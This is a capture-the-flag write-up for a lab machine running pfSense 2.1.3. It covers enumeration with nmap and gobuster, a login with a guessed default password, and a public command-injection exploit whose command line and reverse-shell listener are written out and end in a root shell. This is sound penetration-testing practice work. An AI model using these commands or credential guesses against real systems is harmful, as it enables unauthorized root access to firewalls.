Sense

OS: FreeBSD, Difficulty: Easy, IP: 10.10.10.60

Initial Enumeration

# Nmap 7.80 scan initiated Fri Sep 27 18:41:07 2019 as: nmap -sV -sC -O -A -oN O-Detailed -p 80,443 10.10.10.60
Nmap scan report for 10.10.10.60
Host is up (0.24s latency).

PORT    STATE SERVICE    VERSION
80/tcp  open  http       lighttpd 1.4.35
|_http-server-header: lighttpd/1.4.35
|_http-title: Did not follow redirect to https://10.10.10.60/
|_https-redirect: ERROR: Script execution failed (use -d to debug)
443/tcp open  ssl/https?
|_ssl-date: TLS randomness does not represent time
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: specialized|general purpose
Running (JUST GUESSING): Comau embedded (92%), OpenBSD 4.X (85%)
OS CPE: cpe:/o:openbsd:openbsd:4.3
Aggressive OS guesses: Comau C4G robot control unit (92%), OpenBSD 4.3 (85%), OpenBSD 4.0 (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops

TRACEROUTE (using port 80/tcp)
HOP RTT       ADDRESS
1   243.80 ms 10.10.14.1
2   243.69 ms 10.10.10.60

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Sep 27 18:42:59 2019 -- 1 IP address (1 host up) scanned in 111.85 seconds

Checking out the page, it turns out it the login interface of pfsense and the default credentials of admin:pfsesne did not seem to work. So I ran gobuster on the URL and found a txt file called system-users.txt which contained the username rohit and password was supposed to be company default, so I chose to try pfsense and this combination got me into the dashboard.

As evident from the version information this is pfsense 2.1.3, so I ran this service and version info against searchsploit and found one command injection vulnerability.

-------------------------------------------------------------------------------------------------------------- ----------------------------------------
 Exploit Title                                                                                                |  Path
                                                                                                              | (/usr/share/exploitdb/)
-------------------------------------------------------------------------------------------------------------- ----------------------------------------
pfSense < 2.1.4 - 'status_rrd_graph_img.php' Command Injection                                                | exploits/php/webapps/43560.py
-------------------------------------------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result

User and Root own

So I ran the exploit script with the parameters it required and was able to get a shell as root on the system.

python3.7 43560.py --username rohit --password pfsense --lhost 10.10.14.8 --rhost 10.10.10.60 --lport 5555
$ nc -lvnp 5555
listening on [any] 5555 ...
connect to [10.10.14.8] from (UNKNOWN) [10.10.10.60] 21729
sh: can't access tty; job control turned off
# id
uid=0(root) gid=0(wheel) groups=0(wheel)
# cat /root/root.txt
d08c3***
# cat /home/rohit/user.txt
87213***

Learning outcome

I need to find better word-list which are more comprehensive and thorough in terms of research. The ones I used, just barely got me through this time.

Last updated